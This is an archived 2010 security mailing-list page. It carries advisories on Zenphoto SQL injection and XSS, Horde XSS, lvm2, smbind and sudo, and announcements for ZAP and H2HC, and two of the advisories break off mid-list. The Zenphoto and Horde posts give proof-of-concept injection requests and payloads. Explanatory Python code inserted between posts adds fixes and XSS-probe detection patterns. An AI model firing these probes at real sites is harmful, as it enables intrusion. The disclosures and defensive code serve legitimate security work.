Security problems in Zenphoto version 1.3

2010-09-07 Thread Bogdan Calin
We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7. In this blog post, we will look into the details of a number
of security problems discovered by Acunetix WVS in the popular web
gallery application Zenphoto.

Zenphoto is a standalone gallery CMS that just makes sense and
doesn’t try to do everything and your dishes. We hope you agree with our
philosophy: simpler is better. Don’t get us wrong though – Zenphoto
really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3:

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
3. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below:

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL Query:
SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE
"1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/
ACUEND"

Stack trace:
  1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE
     `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\n
     ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM
     `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE
     "1ACUSTART'"*/\nACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/\nACUEND", [string]
     "album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/\n   ACUEND")

As you can see in the SQL query (or the stack trace), in order to alter
the SQL statement sent to the database you need to use a double quote
(not a single one, as in most SQL injections).

Sample HTTP request:
GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75 HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to " onmouseover=prompt(934419) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP request:
GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to " onmouseover=prompt(932890) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:
POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22

These vulnerabilities were reported to the Zenphoto team on 22/7/2010
via the trac system on their website and they were fixed in the latest
version of Zenphoto. If you are using Zenphoto, download the latest
version from their website.

-
Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix
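As an added illustration of the double-quote point made in the post above (this is not code from Bogdan's post or from Zenphoto), the Python below rebuilds the string-spliced LIKE query against a constructed in-memory SQLite table, shows that escaping only single quotes leaves it open when the delimiter is a double quote, and contrasts it with a bound parameter. It also covers a caveat the post does not reach: a bound parameter stops injection, but under LIKE a client-supplied % still matches every row unless wildcards are escaped. The table, its rows and the function names are assumptions.

```python
import sqlite3


def make_album_db():
    """Constructed in-memory stand-in for the zp_albums table in the
    advisory's query (sample rows, not Zenphoto data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE albums (id INTEGER PRIMARY KEY, folder TEXT, album_theme TEXT)"
    )
    conn.executemany(
        "INSERT INTO albums (folder, album_theme) VALUES (?, ?)",
        [("holiday", "default"), ("private_2010", "zenpage")],
    )
    return conn


def build_query_naive(folder):
    """The vulnerable pattern: the folder value is spliced into a statement
    whose string delimiter is the double quote, as in the advisory's query,
    while the code only escapes single quotes.  Returned as text only; it is
    never executed here."""
    escaped = folder.replace("'", "''")
    return 'SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "%s"' % escaped


def delimiters_intact(sql):
    """The template above contributes exactly two double quotes; any other
    double quote came from the untrusted value and changes the statement."""
    return sql.count('"') == 2


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so the bound value is matched literally."""
    return (
        value.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def find_album(conn, folder):
    """The hardened lookup: the value is bound as a parameter (quotes of
    either kind cannot terminate it) and LIKE wildcards are escaped."""
    return conn.execute(
        "SELECT id, album_theme FROM albums WHERE folder LIKE ? ESCAPE '\\'",
        (escape_like(folder),),
    ).fetchall()


def find_album_wildcards_allowed(conn, folder):
    """Bound parameter but no wildcard escaping: immune to injection, yet a
    bare '%' from the client still matches every album."""
    return conn.execute(
        "SELECT id, album_theme FROM albums WHERE folder LIKE ?", (folder,)
    ).fetchall()


if __name__ == "__main__":
    db = make_album_db()
    probe = 'x" OR "1"="1'
    print("naive statement:", build_query_naive(probe))
    print("delimiters intact:", delimiters_intact(build_query_naive(probe)))
    print("bound lookup with probe:", find_album(db, probe))
    print("bound lookup, wildcard allowed:", find_album_wildcards_allowed(db, "%"))
```

The ESCAPE clause matters because the original query is a LIKE, not an equality test: binding alone makes the statement structure fixed, but the semantics of % and _ inside the bound value are still the database's, so a lookup that is meant to be exact has to escape them as well.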


[ MDVSA-2010:171 ] lvm2

2010-09-07 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:171
 http://www.mandriva.com/security/
 ___

 Package : lvm2
 Date    : September 6, 2010
 Affected: 2009.1, 2010.0, 2010.1
 ___

 Problem Description:

 A vulnerability has been found and corrected in lvm2:
 
 The cluster logical volume manager daemon (clvmd) in lvm2-cluster
 in LVM2 before 2.02.72, as used in Red Hat Global File System (GFS)
 and other products, does not verify client credentials upon a socket
 connection, which allows local users to cause a denial of service
 (daemon exit or logical-volume change) or possibly have unspecified
 other impact via crafted control commands (CVE-2010-2526).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2526
 ___

 Updated Packages:

 Mandriva Linux 2009.1:
 11ac47baa0dffc858deae4847afc95bc  2009.1/i586/clvmd-2.02.33-8.1mnb2.i586.rpm
 3e28f4c39a97f96dff14ea07e63c0375  2009.1/i586/lvm2-2.02.33-8.1mnb2.i586.rpm
 1473d81d8d69eecfffeba569d6a524ab  2009.1/SRPMS/lvm2-2.02.33-8.1mnb2.src.rpm

 Mandriva Linux 2009.1/X86_64:
 f3c07dc0fa38749ea2be8b8a334e08c7  2009.1/x86_64/clvmd-2.02.33-8.1mnb2.x86_64.rpm
 18f0a933f3236c38a7b2f0c8fdfb0516  2009.1/x86_64/lvm2-2.02.33-8.1mnb2.x86_64.rpm
 1473d81d8d69eecfffeba569d6a524ab  2009.1/SRPMS/lvm2-2.02.33-8.1mnb2.src.rpm

 Mandriva Linux 2010.0:
 28d2ca049d8736523166f7c99730550d  2010.0/i586/clvmd-2.02.53-9.2mnb2.i586.rpm
 e6456c6b7f8b64bb9579cd485fd1883c  2010.0/i586/dmsetup-1.02.38-9.2mnb2.i586.rpm
 f44de286bd97799df0633639605f9a7b  2010.0/i586/libdevmapper1.02-1.02.38-9.2mnb2.i586.rpm
 9b497f111670636f1dfc9fd3d0635b63  2010.0/i586/libdevmapper-devel-1.02.38-9.2mnb2.i586.rpm
 dc1d8288bc99b1a1e18508d6a0edb595  2010.0/i586/libdevmapper-event1.02-1.02.38-9.2mnb2.i586.rpm
 9b01ee505c3a4949fa0f161c03280b83  2010.0/i586/libdevmapper-event-devel-1.02.38-9.2mnb2.i586.rpm
 61cfd88b9c6789d37fdaf4f6254116ff  2010.0/i586/liblvm2cmd2.02-2.02.53-9.2mnb2.i586.rpm
 929d5d33f66502a078cd8212e1b537b1  2010.0/i586/liblvm2cmd-devel-2.02.53-9.2mnb2.i586.rpm
 b17cbac08c61dce99597e6dbb6702045  2010.0/i586/lvm2-2.02.53-9.2mnb2.i586.rpm
 27e1f390f03910f521d6c9248fd28cfb  2010.0/SRPMS/lvm2-2.02.53-9.2mnb2.src.rpm

 Mandriva Linux 2010.0/X86_64:
 3bf5a13a5e066af39062bdaa7a4e6d87  2010.0/x86_64/clvmd-2.02.53-9.2mnb2.x86_64.rpm
 aa1f570c9a929aee83dd9547ae905468  2010.0/x86_64/dmsetup-1.02.38-9.2mnb2.x86_64.rpm
 81f077f42936ec8be557105a220a149b  2010.0/x86_64/lib64devmapper1.02-1.02.38-9.2mnb2.x86_64.rpm
 e90c54801d5d3e201d68731e2cbc4dc5  2010.0/x86_64/lib64devmapper-devel-1.02.38-9.2mnb2.x86_64.rpm
 56d2c5cd25dfef94a15568c420743fea  2010.0/x86_64/lib64devmapper-event1.02-1.02.38-9.2mnb2.x86_64.rpm
 4cff5d26f20d11a57a7dffe7fb3421a8  2010.0/x86_64/lib64devmapper-event-devel-1.02.38-9.2mnb2.x86_64.rpm
 40f4f8aa95abd23c8640e5cf22031b02  2010.0/x86_64/lib64lvm2cmd2.02-2.02.53-9.2mnb2.x86_64.rpm
 a87f6ecae4c05b5ced933cb3468ed499  2010.0/x86_64/lib64lvm2cmd-devel-2.02.53-9.2mnb2.x86_64.rpm
 96c9b9781d1168c90a557cc583930a7e  2010.0/x86_64/lvm2-2.02.53-9.2mnb2.x86_64.rpm
 27e1f390f03910f521d6c9248fd28cfb  2010.0/SRPMS/lvm2-2.02.53-9.2mnb2.src.rpm

 Mandriva Linux 2010.1:
 48f74df7e0156e45f230429aa41cea7a  2010.1/i586/clvmd-2.02.61-5.1mnb2.i586.rpm
 a5fa92bb7251a9f9b9a651a9d681c470  2010.1/i586/cmirror-2.02.61-5.1mnb2.i586.rpm
 c7281a45862b7460be4b9623165cc591  2010.1/i586/dmsetup-1.02.44-5.1mnb2.i586.rpm
 98c4f715edc57a2a81631cb2ab9a824b  2010.1/i586/libdevmapper1.02-1.02.44-5.1mnb2.i586.rpm
 e5b0271e14e85ad94cb3e746960993b1  2010.1/i586/libdevmapper-devel-1.02.44-5.1mnb2.i586.rpm
 2b83f2c3a303604e42868b074364b017  2010.1/i586/libdevmapper-event1.02-1.02.44-5.1mnb2.i586.rpm
 aef97aaed0fd616df5a046d9b05f55e2  2010.1/i586/libdevmapper-event-devel-1.02.44-5.1mnb2.i586.rpm
 1ed885e2a23ca5f9bdaa5796615feeea  2010.1/i586/liblvm2app2.1-2.02.61-5.1mnb2.i586.rpm
 9a62cea841692f4a744019664cb6b959  2010.1/i586/liblvm2cmd2.02-2.02.61-5.1mnb2.i586.rpm
 a1bc253b7a92b6c7b1ac96e7e2521ee3  2010.1/i586/liblvm2cmd-devel-2.02.61-5.1mnb2.i586.rpm
 972c3885883f95b793e4dfaa46121685  2010.1/i586/liblvm2-devel-2.02.61-5.1mnb2.i586.rpm
 08190534acaa182f48f8c2aca8b3ad31  2010.1/i586/lvm2-2.02.61-5.1mnb2.i586.rpm
 3de3e283a5907efe36b7f5b9038c32a2  2010.1/SRPMS/lvm2-2.02.61-5.1mnb2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 3c33074b320e7b7651b9872674bce70b  2010.1/x86_64/clvmd-2.02.61-5.1mnb2.x86_64.rpm
 e0bcdee0b2f4e725bfd17b35a9959aa0  2010.1/x86_64/cmirror-2.02.61-5.1mnb2.x86_64.rpm
 47c54c45f3f00ae9fe0f9176623739ac

The Zed Attack Proxy (ZAP) version 1.0.0

2010-09-07 Thread psiinon
Hello,

I'd like to announce the first release of the Zed Attack Proxy (ZAP) -
https://code.google.com/p/zaproxy/ - a penetration test tool designed
to be used to make web applications more secure.

Why has it been released?

There are many excellent pen test tools, but few of them are really
suitable for people with little pen test experience.
ZAP is really intended for developers and functional testers who are
new to pen testing. However, experienced pen testers may find it useful
as well.
While ZAP can detect some security issues automatically, it is
primarily designed to help you find security vulnerabilities manually.
In order to make ZAP as easy to use as possible, a user guide is
available both as context-sensitive help within ZAP and online.

ZAP is a fork of the well-regarded Paros Proxy and is open source and
cross-platform.
Note that there will NOT be a 'Pro' version of ZAP, so there will be
no incentive to restrict the features available in the 'free' version
:)
Involvement in the development of ZAP is actively encouraged.

Regards,

Psiinon


[SECURITY] [DSA-2103-1] New smbind packages fix sql injection

2010-09-07 Thread Giuseppe Iuculano
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-2103-1                    secur...@debian.org
http://www.debian.org/security/                          Giuseppe Iuculano
September 05, 2010                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: smbind
Vulnerability  : sql injection
Problem type   : remote
Debian-specific: no
CVE ID : none assigned yet

It was discovered that smbind, a PHP-based tool for managing DNS zones
for BIND, does not properly validate input.
An unauthenticated remote attacker could execute arbitrary SQL commands
or gain access to the admin account.

For the stable distribution (lenny), this problem has been fixed in
version 0.4.7-3+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 0.4.7-5, and will migrate to the testing distribution (squeeze)
shortly.

We recommend that you upgrade your smbind (0.4.7-3+lenny1) package.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7.orig.tar.gz
    Size/MD5 checksum:    90623 8474d376798773e3fac85564cf6b57cb
  http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1.diff.gz
    Size/MD5 checksum:    12752 d19eaec93f7aec12b7a776d5056ad650
  http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1.dsc
    Size/MD5 checksum:     1038 49648258f7ca6f057e8f4ae156f250fb

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1_all.deb
    Size/MD5 checksum:    94656 25b628ff527d505824d139d5e8d10259


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkyEC+QACgkQNxpp46476arnSgCfcyXa3LsnWqpi/vzbmiaPl5PH
PBMAn0SWLgjHwK7VQveyIMzq4HjnX0Ib
=8m8H
-----END PGP SIGNATURE-----



H2HC São Paulo - Capture the Captcha

2010-09-07 Thread Rodrigo Rubira Branco (BSDaemon)
 We would like to thank our sponsors for making this game possible:
Bonsai for hosting the game and Tenable for providing the prize!

A Captcha is a type of challenge-response test used in computing to
ensure that the response is not generated by a computer. It is a
contrived acronym for "Completely Automated Public Turing test to tell
Computers and Humans Apart."

The process usually involves one computer asking a user to complete a
simple test (Captcha) which the computer is able to generate and grade.
Because other computers are unable to solve the Captcha, any user
entering a correct solution is presumed to be Human.

There are a lot of Captcha implementations out there, written in JSP,
PHP, ASP, .NET which are very poorly implemented and introduce serious
bugs in Web applications they are supposed to protect.

We developed 10 different Captcha implementations, each with its own
weakness, for participants to break using automation and hacking
techniques with the objective of bypassing the human verification process.

Teams (or a single participant) are scored on their success in breaking
the security behind every presented Captcha on the game.

This CTC contest is designed to serve as an educational exercise to give
participants experience in securing Web Applications from automated
attacks, as well as conducting and reacting to the sort of Captchas
found in the wild.

The participants will need to register during the conference and the
winners will need to provide full information in order to receive the
major prize: the Nessus Professional Edition from Tenable!




XSS in Horde Application Framework <=3.3.8, icon_browser.php

2010-09-07 Thread Moritz Naumann
Hi,

Horde Application Framework v3.3.8 and lower are subject to a cross site
scripting (XSS) vulnerability.

The icon_browser.php script fails to properly sanitize user supplied
input to the 'subdir' URL parameter before printing it out as part of an
HTML formatted error message.

The following URL can be used as a proof of concept:

> [path_to_horde]/util/icon_browser.php?subdir= onload="alert('XSS')">&app=horde

Prior authentication is not required for exploitation.

This vulnerability was reported to the Horde Project on 19.05.2010 and
fixed by Michael M. Slusarz in the framework's Git repository within a week:
> http://git.horde.org/diff.php/horde/util/icon_browser.php?rt=horde-git&r1=a978a35c3e95e784253508fd4333d2fbb64830b6&r2=9342addbd2b95f184f230773daa4faf5ef6d65e9

Hoping to see an upcoming fixed release (which did not take place)
I have delayed publication - admittedly too much.

Credits for this discovery:

Moritz Naumann
Naumann IT Security Consulting, Berlin, Germany
http://moritz-naumann.com

Moritz
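Both the Zenphoto admin.php findings earlier on this page (parameters "from" and "user", reflected between double quotes inside a tag) and the Horde icon_browser.php finding above are reflected XSS where a request value reaches HTML output without encoding. The Python below is an added example, not code from either advisory or either project: it renders the probe reported for Zenphoto into a double-quoted attribute with and without html.escape(quote=True), parses the result the way a browser's tokenizer would to confirm whether an event-handler attribute was injected, and flags the same probe shape in request lines and form-encoded bodies. The input template, the constant and the sample request lines are constructed.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The probe reported for Zenphoto's "from" and "user" parameters, taken from
# the advisory's sample requests and percent-decoded; constructed test input.
ATTRIBUTE_BREAKOUT = '" onmouseover=prompt(934419) bad="'


def render_unsafe(value):
    """Vulnerable pattern: the value lands inside a double-quoted attribute
    with no encoding, which is how both advisories describe the reflection."""
    return '<input type="text" name="from" value="%s">' % value


def render_safe(value):
    """Same template with html.escape(quote=True): a double quote in the
    input becomes &quot; and can no longer terminate the attribute."""
    return '<input type="text" name="from" value="%s">' % html.escape(value, quote=True)


class _TagCollector(HTMLParser):
    """Collects (tag, attributes) pairs as a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def injected_handlers(fragment):
    """Return any on* event-handler attributes found after parsing.  The
    templates above never emit one, so a hit means the input broke out of
    the attribute."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return sorted(
        name for _tag, attrs in parser.tags for name in attrs if name.startswith("on")
    )


# Constructed access-log request lines in the shape of the advisory's sample
# GET requests: one carrying the probe, one benign.
SAMPLE_REQUEST_LINES = [
    "GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1",
    "GET /zenphoto_1_3/zp-core/admin.php?from=gallery&page=2 HTTP/1.1",
]

# A quote followed by on*= is the signature of an attribute-breakout probe;
# it is checked on the decoded value so encoding variants still match.
HANDLER_PROBE = re.compile(r"""["']\s*on\w+\s*=""", re.IGNORECASE)


def flag_handler_probes(query_string):
    """Map parameter name -> decoded value for every value matching the probe
    pattern.  Works for a GET query string or a form-encoded POST body."""
    hits = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        for value in values:
            if HANDLER_PROBE.search(value):
                hits[name] = value
    return hits


def scan_request_lines(lines):
    """Apply flag_handler_probes to the query part of each request line and
    return (line_number, hits) for the lines that carry a probe."""
    findings = []
    for number, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 2:
            continue
        hits = flag_handler_probes(urlsplit(parts[1]).query)
        if hits:
            findings.append((number, hits))
    return findings
```

The parse-based check is deliberate: grepping the rendered output for the payload would also "find" it in the escaped version, whereas asking a tokenizer which attributes actually exist answers the question a browser would answer. The log check decodes before matching for the same reason; the advisory's request carries the probe fully percent-encoded, and %3d-style encoding of "=" defeats a raw substring match.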


[USN-983-1] Sudo vulnerability

2010-09-07 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-983-1 September 07, 2010
sudo vulnerability
CVE-2010-2956
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  sudo                            1.7.0-1ubuntu2.5
  sudo-ldap                       1.7.0-1ubuntu2.5

Ubuntu 10.04 LTS:
  sudo                            1.7.2p1-1ubuntu5.2
  sudo-ldap                       1.7.2p1-1ubuntu5.2

In general, a standard system update will make all the necessary changes.

Details follow:

Markus Wuethrich discovered that sudo did not always verify the user when a
group was specified in the Runas_Spec. A local attacker could exploit this
to execute arbitrary code as root if sudo was configured to allow the
attacker to use a program as a group when the attacker was not a part of
that group.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5.diff.gz
  Size/MD5:25514 9bfdb8f41c6a5dd5544e6d6b8ab4ac5c
http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5.dsc
  Size/MD5: 1117 431ea989e3fa57b00f8fb13f3e54a025
http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0.orig.tar.gz
  Size/MD5:   744311 5fd96bba35fe29b464f7aa6ad255f0a6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_amd64.deb
  Size/MD5:   310700 e0e0a0dc1fb83f31f996679b9b13b01f

http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_amd64.deb
  Size/MD5:   334376 9492e829a5b04057a804697e644b9644

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_i386.deb
  Size/MD5:   298210 70b9f891286606ce2a4b1db2f3676bd4

http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_i386.deb
  Size/MD5:   319766 c0df54d97c686bccea3a2b986833d44e

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_lpia.deb
  Size/MD5:   298316 609d145034a593e5b637c0c5b9e176b8

http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_lpia.deb
  Size/MD5:   320176 426ef7871e3c372491fbbd8790350857

  powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_powerpc.deb
  Size/MD5:   306220 7b0b1b6e6ee37e4b33a638e7f2ac292e

http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_powerpc.deb
  Size/MD5:   329152 1b0cb4498c03cc2883c00837bff8bb83

  sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_sparc.deb
  Size/MD5:   301892 f46d44e1a8c46a575c5c4f0700910462

http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_sparc.deb
  Size/MD5:   323970 7a10f46aa2c9388aa74a342d44c41ac4

Updated packages for Ubuntu 10.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2.diff.gz
  Size/MD5:26583 f3077ddbefcc852cb66d71ec63e0013c

http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2.dsc
  Size/MD5: 1131 456ecc22f3b88cb3e60dbfac679b110a
http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1.orig.tar.gz
  Size/MD5:   771059 4449d466a774f5ce401c9c0e3866c026

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_amd64.deb
  Size/MD5:   326768 29f77801c5304c74366abaecd451080b

http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_amd64.deb
  Size/MD5:   350566 08c716ab408e519bb090e2a46715696c

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_i386.deb
  Size/MD5:   312528 8bdaeb041859991919aade6a85c70cd1

http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_i386.deb
  Size/MD5:   334432 bf7f83603498e26e4f7618eea82cb836

  powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_powerpc.deb
  Size/MD5:   321234 498592d623ad408c02dc9dc3794674ae

http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_powerpc.deb
  Size/MD5:   345118 09a20cd3444df0ac4ac34b0829332fac

  sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_sparc.deb
  Size/MD5:   318604 71c8f38d4

Call for Papers H2HC Cancun/Mexico and H2HC Sao Paulo/Brazil

2010-09-07 Thread Rodrigo Rubira Branco (BSDaemon)
 CALL FOR PAPERS - Hackers 2 Hackers Conference 7th edition

The call for papers for H2HC 7th edition is now open.  H2HC is a hacker
conference taking place in Sao Paulo, Brazil, from 27 to 28 November
2010 and this year for the first time also in Cancun, on 3 of December 2010.

[ - Introduction - ]

For the seventh consecutive year and past success we have been having,
the annual Hackers 2 Hackers Conference will be held again in Sao Paulo,
from 27 to 28 November 2010, and for the first time also in Cancun, on
3rd of December 2010 and aims to get together industry, government,
academia and underground hackers to share knowledge and leading-edge
ideas about information security and everything related to it.

H2HC will feature national and international speakers and attendees with
a wide range of skills. The atmosphere is favorable to present all
facets of computer security subject and will be a great opportunity to
network with like-minded people and enthusiasts.

The conference language is either Portuguese or English for the São
Paulo Edition and Spanish and English for the Cancun edition.

[ - The venue - ]

H2HC 7th edition will take place at Novotel Morumbi \
(http://www.accorhotels.com.br/guiahoteis/novotel/hotel_convencao.asp?cd_hotel=20)
in an auditorium with capacity for up to 400 people.

The first edition of H2HC in Cancun will take place at Melia ME Cancun
(http://www.me-cancun.com/) in an auditorium with capacity for up to 150
people.

[*] About Sao Paulo (taken from fiquemaisumdia.com.br)

  The city is the largest in Brazil and first in South America by
population. Quite often Sao Paulo intimidates people because of its
size, its constant pedestrian and vehicle traffic, ethnic and cultural
multiplicity. Sao Paulo will surprise you whether you come here on
business or for an expo, a congress or a convention; stay for at least
one more day. Let yourself be seduced by the cultural diversity of
this many-faceted city which vibrates, dictates fashion, is always
anticipating trends, and welcomes Brazilians and foreigners from all
over. And oh, do not forget to have fun in South America's wildest night
life.

[*] About Cancun (wikipedia.com)
Cancún (Spanish pronunciation: [kaŋˈkun]) is a coastal city in Mexico's
easternmost state, Quintana Roo, on the Yucatán Peninsula. Cancún is
located on the Yucatan Channel that separates Mexico from the island of
Cuba in the Greater Antilles. The Cancún region is sometimes known as
the Mexican Caribbean.


[ - Topics - ]

  H2HC committee gives preference to lectures with practical
demonstration. The conference staff will try to provide every equipment
needed for the presentation in the case the author cannot provide them.

The following topics include, but are not limited to:

* Penetration testing
* Web application security
* Exploit development techniques
* Telecom security and phone phreaking
* Fuzzing and application security test
* Techniques for development of secure software and systems
* Hardware hacking, embedded systems and other electronic devices
* Mobile devices exploitation, Symbian, P2K and bluetooth technologies
* Analysis of virus, worms and all sorts of malwares
* Reverse engineering
* Rootkits
* Security in Wi-Fi and VoIP environments
* Information about smartcard and RFID security and similar
* Technical approach to alternative operating systems
* Denial of service attacks and/or countermeasures
* Security aspects in SCADA and industrial environments and
"obscure" networks
* Cryptography
* Lockpicking, trashing, physical security and urban exploration
* Internet, privacy and Big Brother
* Information warfare and industrial espionage

[ - Important dates - ]

Conference and trainings - H2HC São Paulo/Brazil

  November 25th and 26th: H2HC trainings 1
  November 27th and 28th: H2HC 7th edition
  November 29th and 30th: H2HC trainings 2

Conference - H2HC Cancun/Mexico
  December 3rd
 
Deadline and submissions

  Deadline for proposal submissions: September 25 2010   
  Deadline for slides submissions:   October 05 2010   

Notification of acceptance or rejection: no later than October 10 2010

